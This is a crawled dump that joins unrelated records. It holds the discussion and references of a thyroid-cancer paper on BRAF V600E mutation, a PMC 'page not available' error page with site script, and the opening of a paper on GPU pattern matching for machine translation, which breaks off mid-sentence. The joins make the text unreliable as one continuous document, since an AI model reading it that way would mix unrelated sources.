rate of 39.45% in PTCs (17). The meta-analysis showed BRAF V600E mutations occurred in 60.6% of PTCs (update to August, 2015) (6). In 2016, Kim et al. reported BRAF V600E mutations were presented in 83.7% PTC patients (2789 of 3332) (18), and we found the similar mutation rate in our sample. Compared to previous researches, we update BRAF V600E mutation data from 2015 to 2018. The reason why mutation prevalence in our study is higher than the average may ascribe to population aging in recent years and different research methodology. In this study, the BRAF V600E mutations were tested from the postoperative tissue samples using the ARMS- real- time PCR method, which was more sensitive and robust at detecting BRAF V600E somatic mutations than DNA sequencing on clinical samples (19). Our study indicated that older age and concomitant hypertension were independent risk factors of BRAF V600E mutation. On the contrary, concomitant HT was an independent protective factor of the mutation. Despite being insignificant after multivariate adjustment, the presence of family history of cancer was associated with higher BRAF V600E mutation incidence in the univariate analysis, which were in agreement with the data reported in previous study (20). In addition, with the large size of this study, negative correlation between HT and BRAF V600E mutation was demonstrated, which was confirmed in a recent smaller study (21). Potential mechanisms and immunological link that might lead to the synchronous appearance of HT and PTC had been investigated (22, 23). If there is more clinical evidence, the correlation between BRAF V600E and family history of cancer, hypertension and HT may help to promote the investigation of BRAF V600E mutation mechanism. As for the factor of age, plenty of researches had found that incidence of BRAF V600E was higher in patients >45 years old (10, 16), but few studies found the positive correlation between BRAF V600E and age (Fig. 2). Compared to adults, PTC in pediatric and adolescents presents more lymph node metastases, distant metastases and recurrence (24, 25). Combining the study mentioned above, the phenomenon that less number of BRAF V600E mutations appears in patients aged under 25 years suggested that aggressive features displayed in these patients may not be caused by BRAF V600E mutation. The aggressive role of BRAF V600E mutations has been widely investigated in previous studies (6, 8, 10). However, our results did not show that BRAF V600E mutation is a biomarker in driving aggressiveness. Given the high and increased prevalence of BRAF V600E mutation in recent years (60.6%, on average, in the meta-analysis mentioned above (6), and 83.7% in our study), and the oppositely indolent behavior, the rarity recurrence and mortality of PTC (16 and 3%, respectively) (26, 27), an absence of association between BRAF V600E mutation, and these negative events seem logical. In univariate analyses, BRAF V600E mutations were significantly associated with smaller tumor, bilateral multifocality, advanced disease stage and less aggressive lymph node metastases in PTCs. Advanced TNM stage showed insignificant after multivariate adjustment. Therefore, bilateral multifocality seems to be the only risk factor associated with BRAF V600E. Notably, a recent study showed tumor multifocality has no independent risk prognostic value in outcomes of PTC (28). Other classic risk factors (29), such as extrathyroidal extension, distant metastases and disease recurrence, were insignificantly associated with BRAF V600E mutation. Therefore, presence of BRAF V600E is not an aggressive role associated with poor clinicopathologic outcomes in PTC. A recent publication has called into question the relationship of BRAF V600E mutation and prognosis in PTC. In the analysis of 508 patients with BRAF V600E mutation, Henke et al. found the mutation is not predictive of long-term outcome in PTC (7). Although the presence of BRAF V600E mutation is not an aggressive prognosis on poor clinical outcomes, surgery strategy and treatment guided by the presence of the mutation may be available. Such therapies might include determining surgery extent and the use of BRAF inhibitors. The association between BRAF V600E and bilateral lesions and less lateral lymph node metastases was found in our study. If there is more clinical evidence in the future, the status of BRAF V600E mutation may be considered as one of the factors for determining the surgery extent besides tumor size, extrathyroidal extension, vascular invasion, lymph node size and willingness of patients (30). Furthermore, considerable patients with BRAF V600E mutation will have recurrence since a majority of PTC patients in our cohort (83.7%) had the mutation. We propose that high-risk patients with BRAF V600E This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 995 PB–9 8:7 mutation use BRAF inhibitors, such as sorafenib, lenvatinib and vemurafenib. Those patients might benefit from the targeted therapy, which (sorafenib and lenvatinib) have been approved for metastatic PTC (31). The greatest strengths of this study are its consecutive large cohort (2048 PTC patients) and its latest research time (from 2015 to 2018). The limitations of this study were as follows. First, a selection bias could occur in this retrospective unicentral research. The large consecutive cohort of patients may help minimize the bias. Second, follow-up time was short in this study (mean 23.4 months, range, 5–47 months). And research on the mechanism of epidemiological features associated with BRAF V600E mutation in PTCs should be carried out in the future. In summary, this was a large consecutive retrospective study that investigated the relationship of BRAF V600E mutation with epidemiological and clinicopathological features. Older age and concomitant hypertension were independent risk factors of BRAF V600E mutation. Concomitant HT was an independent protective factor for the BRAF V600E expression. Bilateral multifocality was the only risk factor associated with BRAF V600E but a recent study showed it has no independent risk prognostic value in outcomes of PTC. Other poor clinicopathological features were insignificantly associated with the mutation. Although the presence of BRAF V600E mutation is not an aggressive prognosis on poor clinical outcomes, surgery and treatment guided by the presence of the mutation may be available. Declaration of interest The authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. Funding The authors would like to acknowledge support from the National Natural Science Foundation of China (No. 81572917). Ethical approval Consent has been obtained from each patient after full explanation of the purpose and nature of all procedures used. The study was approved by an independent ethics committee of Xijing Hospital (first affiliated hospital of Fourth Military Medical University). References 1 Pacini F & Castagna MG. Approach to and treatment of differentiated thyroid carcinoma. Medical Clinics of North America 2012 96 369–383. (https://doi.org/10.1016/j.mcna.2012.01.002) 2 Pellegriti G, Frasca F, Regalbuto C, Squatrito S & Vigneri R. Worldwide increasing incidence of thyroid cancer: update on epidemiology and risk factors. Journal of Cancer Epidemiology 2013 2013 965212. (https://doi.org/10.1155/2013/965212) 3 Jung CK, Little MP, Lubin JH, Brenner AV, Wells SA, Jr, Sigurdson AJ & Nikiforov YE. The increase in thyroid cancer incidence during the last four decades is accompanied by a high frequency of BRAF mutations and a sharp increase in RAS mutations. Journal of Clinical Endocrinology and Metabolism 2014 99 E276–E285. (https://doi. org/10.1210/jc.2013-2503) 4 Vuong HG, Altibi AM, Abdelhamid AH, Ngoc PU, Quan VD, Tantawi MY, Elfil M, Vu TL, Elgebaly A, Oishi N, et al. The changing characteristics and molecular profiles of papillary thyroid carcinoma over time: a systematic review. Oncotarget 2017 8 10637–10649. (https://doi.org/10.18632/oncotarget.12885) 5 Nikiforov YE & Nikiforova MN. Molecular genetics and diagnosis of thyroid cancer. Nature Reviews: Endocrinology 2011 7 569–580. (https://doi.org/10.1038/nrendo.2011.142) 6 Zhang Q, Liu SZ, Zhang Q, Guan YX, Chen QJ & Zhu QY. Meta- analyses of association between BRAF(V600E) mutation and clinicopathological features of papillary thyroid carcinoma. Cellular Physiology and Biochemistry 2016 38 763–776. (https://doi. org/10.1159/000443032) 7 Henke LE, Pfeifer JD, Ma C, Perkins SM, DeWees T, El-Mofty S, Moley JF, Nussenbaum B, Haughey BH, Baranski TJ, et al. BRAF mutation is not predictive of long-term outcome in papillary thyroid carcinoma. Cancer Medicine 2015 4 791–799. (https://doi. org/10.1002/cam4.417) 8 Tufano RP, Teixeira GV, Bishop J, Carson KA & Xing M. BRAF mutation in papillary thyroid cancer and its value in tailoring initial treatment: a systematic review and meta- analysis. Medicine 2012 91 274–286. (https://doi.org/10.1097/ MD.0b013e31826a9c71) 9 Xing M, Westra WH, Tufano RP, Cohen Y, Rosenbaum E, Rhoden KJ, Carson KA, Vasko V, Larin A, Tallini G, et al. BRAF mutation predicts a poorer clinical prognosis for papillary thyroid cancer. Journal of Clinical Endocrinology and Metabolism 2005 90 6373–6379. (https:// doi.org/10.1210/jc.2005-0987) 10 Kim TH, Park YJ, Lim JA, Ahn HY, Lee EK, Lee YJ, Kim KW, Hahn SK, Youn YK, Kim KH, et al. The association of the BRAF(V600E) mutation with prognostic factors and poor clinical outcome in papillary thyroid cancer: a meta-analysis. Cancer 2012 118 1764–1773. (https://doi.org/10.1002/cncr.26500) 11 Walczyk A, Kowalska A, Kowalik A, Sygut J, Wypiorkiewicz E, Chodurska R, Pieciak L & Gozdz S. The BRAF(V600E) mutation in papillary thyroid microcarcinoma: does the mutation have an impact on clinical outcome? Clinical Endocrinology 2014 80 899–904. (https://doi.org/10.1111/cen.12386) 12 Nam JK, Jung CK, Song BJ, Lim DJ, Chae BJ, Lee NS, Park WC, Kim JS, Jung SS & Bae JS. Is the BRAF(V600E) mutation useful as a predictor of preoperative risk in papillary thyroid cancer? American Journal of Surgery 2012 203 436–441. (https://doi.org/10.1016/j. amjsurg.2011.02.013) 13 Russo M, Malandrino P, Nicolosi ML, Manusia M, Marturano I, Trovato MA, Pellegriti G, Frasca F & Vigneri R. The BRAF(V600E) mutation influences the short- and medium-term outcomes of classic papillary thyroid cancer, but is not an independent predictor of unfavorable outcome. Thyroid 2014 24 1267–1274. (https://doi. org/10.1089/thy.2013.0675) 14 Gandolfi G, Sancisi V, Piana S & Ciarrocchi A. Time to re-consider the meaning of BRAF V600E mutation in papillary thyroid carcinoma. International Journal of Cancer 2015 137 1001–1011. (https://doi. org/10.1002/ijc.28976) 15 Xing M, Liu R, Liu X, Murugan AK, Zhu G, Zeiger MA, Pai S & Bishop J. BRAF V600E and tert promoter mutations cooperatively identify the most aggressive papillary thyroid cancer with highest recurrence. Journal of Clinical Oncology 2014 32 2718–2726. (https:// doi.org/10.1200/JCO.2014.55.5094) This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://doi.org/10.1016/j.mcna.2012.01.002 https://doi.org/10.1155/2013/965212 https://doi.org/10.1210/jc.2013-2503 https://doi.org/10.1210/jc.2013-2503 https://doi.org/10.18632/oncotarget.12885 https://doi.org/10.1038/nrendo.2011.142 https://doi.org/10.1159/000443032 https://doi.org/10.1159/000443032 https://doi.org/10.1002/cam4.417 https://doi.org/10.1002/cam4.417 https://doi.org/10.1097/MD.0b013e31826a9c71 https://doi.org/10.1097/MD.0b013e31826a9c71 https://doi.org/10.1210/jc.2005-0987 https://doi.org/10.1210/jc.2005-0987 https://doi.org/10.1002/cncr.26500 https://doi.org/10.1111/cen.12386 https://doi.org/10.1016/j.amjsurg.2011.02.013 https://doi.org/10.1016/j.amjsurg.2011.02.013 https://doi.org/10.1089/thy.2013.0675 https://doi.org/10.1089/thy.2013.0675 https://doi.org/10.1002/ijc.28976 https://doi.org/10.1002/ijc.28976 https://doi.org/10.1200/JCO.2014.55.5094 https://doi.org/10.1200/JCO.2014.55.5094 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com C Yan, M Huang et al. BRAF V600E mutation in PTC 9968:7 16 Kebebew E, Weng J, Bauer J, Ranvier G, Clark OH, Duh QY, Shibru D, Bastian B & Griffin A. The prevalence and prognostic value of BRAF mutation in thyroid cancer. Annals of Surgery 2007 246 466–470; discussion 70–71. (https://doi.org/10.1097/ SLA.0b013e318148563d) 17 Kurtulmus N, Duren M, Ince U, Cengiz Yakicier M, Peker O, Aydin O, Altiok E, Giray S, Azizlerli H. BRAF(V600E) mutation in Turkish patients with papillary thyroid cancer: strong correlation with indicators of tumor aggressiveness. Endocrine 2012 42 404–410. (https://doi.org/10.1007/s12020-012-9651-x) 18 Kim SK, Woo JW, Lee JH, Park I, Choe JH, Kim JH & Kim JS. Chronic lymphocytic thyroiditis and BRAF V600E in papillary thyroid carcinoma. Endocrine-Related Cancer 2016 23 27–34. (https://doi. org/10.1530/ERC-15-0408) 19 Ellison G, Donald E, McWalter G, Knight L, Fletcher L, Sherwood J, Cantarini M, Orr M & Speake G. A comparison of ARMS and DNA sequencing for mutation analysis in clinical biopsy samples. Journal of Experimental and Clinical Cancer Research 2010 29 132. (https://doi. org/10.1186/1756-9966-29-132) 20 Zhang Q, Song F, Zheng H, Zhu X, Song F, Yao X, Zhang L & Chen K. Association between single-nucleotide polymorphisms of BRAF and papillary thyroid carcinoma in a Chinese population. Thyroid 2013 23 38–44. (https://doi.org/10.1089/thy.2012.0228) 21 Zeng RC, Jin LP, Chen ED, Dong SY, Cai YF, Huang GL, Li Q, Jin C, Zhang XH & Wang OC. Potential relationship between Hashimoto’s thyroiditis and BRAF(V600E) mutation status in papillary thyroid cancer. Head and Neck 2016 38 (Supplement 1) E1019–E1025. (https://doi.org/10.1002/hed.24149) 22 Ehlers M & Schott M. Hashimoto’s thyroiditis and papillary thyroid cancer: are they immunologically linked? Trends in Endocrinology and Metabolism 2014 25 656–664. (https://doi.org/10.1016/j. tem.2014.09.001) 23 Boi F, Pani F & Mariotti S. Thyroid autoimmunity and thyroid cancer: review focused on cytological studies. European Thyroid Journal 2017 6 178–186. (https://doi.org/10.1159/000468928) 24 Spinelli C, Rossi L, Piscioneri J, Strambi S, Antonelli A, Ferrari A, Massimino M & Miccoli P. Pediatric differentiated thyroid cancer: when to perform conservative and radical surgery. Current Pediatric Reviews 2016 12 247–252. (https://doi.org/10.2174/15733963126661 61014092023) 25 Al-Qurayshi Z, Hauch A, Srivastav S, Aslam R, Friedlander P & Kandil E. A national perspective of the risk, presentation, and outcomes of pediatric thyroid cancer. JAMA Otolaryngology: Head and Neck Surgery 2016 142 472–478. (https://doi.org/10.1001/ jamaoto.2016.0104) 26 Xing M, Alzahrani AS, Carson KA, Shong YK, Kim TY, Viola D, Elisei R, Bendlova B, Yip L, Mian C, et al. Association between BRAF V600E mutation and recurrence of papillary thyroid cancer. Journal of Clinical Oncology 2015 33 42–50. (https://doi.org/10.1200/ JCO.2014.56.8253) 27 Xing M, Alzahrani AS, Carson KA, Viola D, Elisei R, Bendlova B, Yip L, Mian C, Vianello F, Tuttle RM, et al. Association between BRAF V600E mutation and mortality in patients with papillary thyroid cancer. JAMA 2013 309 1493–1501. (https://doi.org/10.1001/ jama.2013.3190) 28 Wang F, Yu X, Shen X, Zhu G, Huang Y, Liu R, Viola D, Elisei R, Puxeddu E, Fugazzola L, et al. The prognostic value of tumor multifocality in clinical outcomes of papillary thyroid cancer. Journal of Clinical Endocrinology and Metabolism 2017 102 3241–3250. (https://doi.org/10.1210/jc.2017-00277) 29 Haugen BR, Alexander EK, Bible KC, Doherty GM, Mandel SJ, Nikiforov YE, Pacini F, Randolph GW, Sawka AM, Schlumberger, et al. 2015 American Thyroid Association management guidelines for adult patients with thyroid nodules and differentiated thyroid cancer: the American Thyroid Association Guidelines Task Force on Thyroid Nodules and Differentiated Thyroid Cancer. Thyroid 2016 26 1–133. (https://doi.org/10.1089/thy.2015.0020) 30 Wang TS & Sosa JA. Thyroid surgery for differentiated thyroid cancer – recent advances and future directions. Nature Reviews: Endocrinology 2018 14 670–683. (https://doi.org/10.1038/s41574-018-0080-7) 31 Brose MS, Nutting CM, Jarzab B, Elisei R, Siena S, Bastholt L, de la Fouchardiere C, Pacini F, Paschke R, Shong YK, et al. Sorafenib in radioactive iodine-refractory, locally advanced or metastatic differentiated thyroid cancer: a randomised, double-blind, phase 3 trial. Lancet 2014 384 319–328. (https://doi.org/10.1016/S0140- 6736(14)60421-9) Received in final form 9 June 2019 Accepted 17 June 2019 Accepted Preprint published online 17 June 2019 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:26PM via free access https://doi.org/10.1097/SLA.0b013e318148563d https://doi.org/10.1097/SLA.0b013e318148563d https://doi.org/10.1007/s12020-012-9651-x https://doi.org/10.1530/ERC-15-0408 https://doi.org/10.1530/ERC-15-0408 https://doi.org/10.1186/1756-9966-29-132 https://doi.org/10.1186/1756-9966-29-132 https://doi.org/10.1089/thy.2012.0228 https://doi.org/10.1002/hed.24149 https://doi.org/10.1016/j.tem.2014.09.001 https://doi.org/10.1016/j.tem.2014.09.001 https://doi.org/10.1159/000468928 https://doi.org/10.2174/1573396312666161014092023 https://doi.org/10.2174/1573396312666161014092023 https://doi.org/10.1001/jamaoto.2016.0104 https://doi.org/10.1001/jamaoto.2016.0104 https://doi.org/10.1200/JCO.2014.56.8253 https://doi.org/10.1200/JCO.2014.56.8253 https://doi.org/10.1001/jama.2013.3190 https://doi.org/10.1001/jama.2013.3190 https://doi.org/10.1210/jc.2017-00277 https://doi.org/10.1089/thy.2015.0020 https://doi.org/10.1038/s41574-018-0080-7 https://doi.org/10.1016/S0140-6736(14)60421-9 https://doi.org/10.1016/S0140-6736(14)60421-9 https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0246 https://ec.bioscientifica.com Abstract Introduction Patients and methods Patient identification and clinicopathologic data collection Mutational analyses Statistical analyses Results BRAF V600E mutation in PTC Association of BRAF V600E and epidemiological features in PTCs Relationship of BRAF V600E and clinicopathological features in PTCs Multivariate logistic regression analysis of BRAF V600E mutation in PTCs Discussion Declaration of interest Funding Ethical approval References work_eeqhqy25cjchrak5hfr6qg3kqi ---- wp-p1m-38.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-38.ebi.ac.uk no 265372276 Params is empty 265372276 exception Params is empty 2021/04/06-17:58:22 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265372276 (wp-p1m-38.ebi.ac.uk) Time: 2021/04/06 17:58:22 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_efnphgi6gzaxhe7ef5nxddwh7u ---- Edinburgh Research Explorer Gappy Pattern Matching on GPUs for On-Demand Extraction of Hierarchical Translation Grammars Citation for published version: He, H, Lin, J & Lopez, A 2015, 'Gappy Pattern Matching on GPUs for On-Demand Extraction of Hierarchical Translation Grammars', Transactions of the Association for Computational Linguistics, vol. 3, pp. 87-100. <https://tacl2013.cs.columbia.edu/ojs/index.php/tacl/article/view/555> Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://tacl2013.cs.columbia.edu/ojs/index.php/tacl/article/view/555 https://www.research.ed.ac.uk/portal/en/publications/gappy-pattern-matching-on-gpus-for-ondemand-extraction-of-hierarchical-translation-grammars(f9f6c86d-3559-4697-9beb-0b85977ace12).html Gappy Pattern Matching on GPUs for On-Demand Extraction of Hierarchical Translation Grammars Hua He Dept. of Computer Science University of Maryland College Park, Maryland huah@cs.umd.edu Jimmy Lin The iSchool and UMIACS University of Maryland College Park, Maryland jimmylin@umd.edu Adam Lopez School of Informatics University of Edinburgh Edinburgh, United Kingdom alopez@inf.ed.ac.uk Abstract Grammars for machine translation can be materialized on demand by finding source phrases in an indexed parallel corpus and extracting their translations. This approach is limited in practical applications by the computational expense of online lookup and extraction. For phrase-based models, recent work has shown that on-demand grammar extraction can be greatly accelerated by parallelization on general purpose graphics processing units (GPUs), but these algorithms do not work for hierarchical models, which require matching patterns that contain gaps. We address this limitation by presenting a novel GPU algorithm for on-demand hierarchical grammar extraction that is at least an order of magnitude faster than a comparable CPU algorithm when processing large batches of sentences. In terms of end-to-end translation, with decoding on the CPU, we increase throughput by roughly two thirds on a standard MT evaluation dataset. The GPU necessary to achieve these improvements increases the cost of a server by about a third. We believe that GPU-based extraction of hierarchical grammars is an attractive proposition, particularly for MT applications that demand high throughput. 1 Introduction Most machine translation systems extract a large, fixed translation model from parallel text that is accessed from memory or disk. An alternative is to store the indexed parallel text in memory and extract translation units on demand only when they are needed to decode new input. This architecture has several advantages: It requires only a few gigabytes to represent a model that would otherwise require a terabyte (Lopez, 2008b). It can adapt incrementally to new training data (Levenberg et al., 2010), mak- ing it useful for interactive translation (González- Rubio et al., 2012). It supports rule extraction that is sensitive to the input sentence, enabling leave-one- out training (Simianer et al., 2012) and the use of sentence similarity features (Philips, 2012). On-demand extraction can be slow, but for phrase-based models, massive parallelization on general purpose graphics processing units (GPUs) can dramatically accelerate performance. He et al. (2013) demonstrated orders of magnitude speedup in exact pattern matching with suffix arrays, the algorithms at the heart of on-demand extraction (Callison-Burch et al., 2005; Zhang and Vogel, 2005). However, some popular translation models use “gappy” phrases (Chiang, 2007; Simard et al., 2005; Galley and Manning, 2010), and the GPU algorithm of He et al. does not work for these models since it is limited to contiguous phrases. Instead, we need pattern matching and phrase extraction that is able to handle variable-length gaps (Lopez, 2007). This paper presents a novel GPU algorithm for on-demand extraction of hierarchical translation models based on matching and extracting gappy phrases. Our experiments examine both grammar extraction and end-to-end translation, comparing quality, speed, and memory use. We compare against the GPU system for phrase-based translation by He et al. (2013) and cdec, a state-of-the-art 87 Transactions of the Association for Computational Linguistics, vol. 3, pp. 87–100, 2015. Action Editor: David Chiang. Submission batch: 6/2014; Revision batch 12/2014; Published 2/2015. c©2015 Association for Computational Linguistics. CPU system for hierarchical translation (Dyer et al., 2010). Our system outperforms the former on translation quality by 2.3 BLEU (replicating previously-known results) and outperforms the latter on speed, improving grammar extraction throughput by at least an order of magnitude on large batches of sentences while maintaining the same level of translation quality. Our contribution is to show, complete with an open-source implementation, how GPUs can vastly increase the speed of hierarchical grammar extraction, particularly for high-throughput MT applications. 2 Algorithms GPU architectures, which are optimized for mas- sively parallel operations on relatively small streams of data, strongly influence the design of our algo- rithms, so we first briefly review some key proper- ties. Our NVIDIA Tesla K20c GPU (Kepler Gen- eration) provides 2496 thread processors (CUDA cores), and computation proceeds concurrently in groups of 32 threads called warps. Each thread in a warp carries out identical instructions in lockstep. When a branching instruction occurs, only threads meeting the branch condition execute, while the rest idle—this is called warp divergence and is a source of poor performance. Consequently, GPUs are poor at “irregular” computations that involve conditionals, pointer manipulation, and complex execution sequences. Our pattern matching algorithm is organized around two general design principles: brute force scans and fine-grained parallelism. Brute force array scans avoid warp divergence since they access data in regular patterns. Rather than parallelize larger algorithms that use these scans as subroutines, we parallelize the scans themselves in a fine-grained manner to obtain high throughput. The relatively small size of the GPU memory also affects design decisions. Data transfer between the GPU and the CPU has high latency, so we want to avoid shuffling data as much as possible. To accomplish this, we must fit all our data structures into the 5 GB memory available on our particular GPU. As we will show, this requires some tradeoffs in addition to careful design of algorithms and associated data structures. 2.1 Translation by Pattern Matching Lopez (2008b) provides a recipe for “translation by pattern matching” that we use as a guide for the remainder of this paper (Algorithm 1). Algorithm 1 Translation by pattern matching 1: for each input sentence do 2: for each phrase in the sentence do 3: Find its occurrences in the source text 4: for each occurrence do 5: Extract any aligned target phrase 6: for each extracted phrase pair do 7: Compute feature values 8: Decode as usual using the scored rules We encounter a computational bottleneck in lines 2–7, since there are many query phrases, matching occurrences, and extracted phrase pairs to process. Below, we tackle each challenge in turn. To make our discussion concrete, we will use a toy English-Spanish translation example. At line 3 we search for phrases in the source side of a parallel text. Suppose that it contains two sentences: it makes him and it mars him, and it sets him on and it takes him off. We map each unique word to an integer id, and call the resulting array of integers that encodes the source text under this transformation the text T . Let |T| denote the total number of tokens, T[i] denote its ith element, and T[i]...T[j] denote the substring starting with its ith element and ending with its jth element. Since T encodes multiple sentences, we use special tokens to denote the end of a sentence and the end of the corpus. In our example we use # and $, respectively, as shown in Figure 1. Now suppose we want to translate the sentence it persuades him and it disheartens him. We encode it under the same mapping as T and call the resulting array the query Q. Our goal is to materialize all of the hierarchical phrases that could be used to translate Q based on training data T . Our algorithm breaks this process into a total of 14 distinct passes, each performing a single type of computation in parallel. Five of these passes are based on the algorithm described by He et al. (2013), and we review them for completeness. The nine new passes are identified as such. 88 i T[i] 1 # 2 it 3 makes 4 him 5 and 6 it 7 mars 8 him 9 # 10 it 11 sets 12 him 13 on 14 and 15 it 16 takes 17 him 18 off 19 # 20 $ ST [i] suffix ST [i]: T[ST [i]]...T[|T|] 5 and it mars him # it sets him on and it takes him off # $ 14 and it takes him off # $ 4 him and it mars him # it sets him on and it takes him off # $ 17 him off # $ 12 him on and it takes him off # $ 8 him # it sets him on and it takes him off # $ 2 it makes him and it mars him # it sets him on and it takes him off # $ 6 it mars him # it sets him on and it takes him off # $ 10 it sets him on and it takes him off # $ 15 it takes him off # $ 3 makes him and it mars him # it sets him on and it takes him off # $ 7 mars him # it sets him on and it takes him off # $ 18 off # $ 13 on and it takes him off # $ 11 sets him on and it takes him off # $ 16 takes him off # $ 1 # it makes him and it mars him # it sets him on and it takes him off # $ 9 # it sets him on and it takes him off # $ 19 # $ 20 $ Figure 1: Example text T (showing words rather than than their integer encodings for clarity) and suffix array ST with corresponding suffixes. 2.2 Finding Every Phrase Line 3 of Algorithm 1 searches T for all occurrences of all phrases in Q. We call each phrase a pattern, and our goal is to find all phrases of T that match each pattern, i.e., the problem of pattern matching. Our translation model permits phrases with at most two gaps, so Q is a source of O(|Q|6) patterns, since there are up to six possible subphrase boundaries. Passes 1-2: Finding contiguous patterns To find contiguous phrases (patterns without gaps), we use the algorithm of He et al. (2013). It requires a suffix array (Manber and Myers, 1990) computed from T . The ith suffix of a 1-indexed text T is the substring T[i]...T[|T |] starting at position i and continuing to the end of T . The suffix array ST is a permutation of the integers 1, ..., |T | ordered by a lexicographic sort of the corresponding suffixes (Figure 1). Given ST , finding a pattern P is simply a matter of binary search for the pair of integers (`,h) such that for all i from ` to h, P is a prefix of the ST [i]th suffix of T . Thus, each integer ST [i] identifies a unique match of P . In our example, the pattern it returns (7, 10), corresponding to matches at positions 2, 6, 10, and 15; while him and it returns (3, 3), corresponding to a match at position 4. A longest common prefix (LCP) array enables us to find h or ` in O(|Q|+ log |T|) comparisons (Manber and Myers, 1990). Every substring of Q is a contiguous pattern, but if we searched T for all of them, most searches would fail, wasting computation. Instead, He et al. (2013) use two passes. The first computes, concurrently for every position i in 1, ..., |Q|, the endpoint j of the longest substring Q[i]...Q[j] that appears in T . It also computes the suffix array range of the one- word substring Q[i]. Taking this range as input, for all k from i to j the second pass concurrently queries T for pattern Q[i]...Q[k]. This pass uses two concurrent threads per pattern—one to find the lowest index of the suffix array range, and one to find the highest index. Passes 3-4: Finding one-gap patterns (New) Passes 1 and 2 find contiguous phrases, but we must 89 also find phrases that contain gaps. We use the special symbol ? to denote a variable-length gap. The set of one-gap patterns in Q thus consists of Q[i]...Q[j] ? Q[i′]...Q[j′] for all i, j, i′, and j′ such that i ≤ j < i′ − 1 and i′ ≤ j′. When the position in Q is not important we use strings u, v, and w to denote contiguous patterns; for example, u ? v denotes an arbitrary one-gap pattern. We call the contiguous strings u and v of u ? v its subpatterns, e.g., it ? him is a pattern with subpatterns it and him. When we search for a gappy pattern, ? can match any non-empty substring of T that does not contain $ or #. Such a match may not be uniquely identified by the index of its first word, so we specify it with a tuple of indices, one for the match of each subpattern. Pattern it ? him has six matches in T : (2, 4), (2, 8), (6, 8), (10, 12), (10, 17), and (15, 17). Passes 3 and 4 search T for all one-gap patterns using the novel GPU algorithm described below. A pattern u ? v cannot match in T unless both u and v match in T , so we use the output of pass 1, which returns all (i,j) pairs such that Q[i]...Q[j] matches in T . Concurrently for every such i and j, pass 3 enumerates all i′ and j′ such that j < i′ − 1 and Q[i′]...Q[j′] matches in T , returning each pattern Q[i]...Q[j] ? Q[i′]...Q[j′]. Pass 3 then sorts and deduplicates the combined results of all threads to obtain a set of unique patterns. These operations are carried out on the GPU using the algorithms of Hoberock and Bell (2010). Pass 4 searches for matches of each pattern iden- tified by pass 3. We first illustrate with it ? him. Pass 2 associates it with suffix array range (7, 10). A linear scan of ST in this range reveals that it matches at positions 2, 6, 10, and 15 in T . Likewise, him maps to range (3, 6) of ST and matches at 4, 17, 12, and 8 in T . Concurrently for each match of the less frequent subpattern, we scan T to find matches of the other subpattern until reaching a sentence boundary or the maximum phrase length, an idea we borrow from the CPU implementation of Baltescu and Blunsom (2014). In our example, both it and him occur an equal number of times, so we arbitrarily choose one—suppose we choose it. We assign each of positions 2, 6, 10, and 15 to a separate thread. The thread assigned position 2 scans T for matches of him until the end of sentence at position 9, finding matches (2, 4) and (2, 8). As a second example, consider it ? and. In this case, it has four matches, but and only two. So, we need only two threads, each scanning backwards from matches of and. Since most patterns are infrequent, allocating threads this way minimizes work. However, very large corpora contain one-gap patterns for which both subpatterns are frequent. We simply precompute all matches for these patterns and retrieve them at runtime, as in Lopez (2007). This precomputation is performed once given T and therefore it is a one-time cost. Materializing every match of u ? v would con- sume substantial memory, so we only emit those for which a translation of the substring matching ? is extractable using the check in §2.3. The success of this check is a prerequisite for extracting the translation of u ? v or any pattern containing it, so pruning in this way conserves GPU memory without affecting the final grammar. Passes 5-7: Finding two-gap patterns (New) We next find all patterns with two gaps of the form u?v ?w. The search is similar to passes 3 and 4. In pass 5, concurrently for every pattern u ? v matched in pass 4, we enumerate the pattern u?v?w for every w such that u?v?w is a pattern in Q and w matched in pass 1. In pass 6, concurrently for every match (i,j) of u?v for every u?v ?w 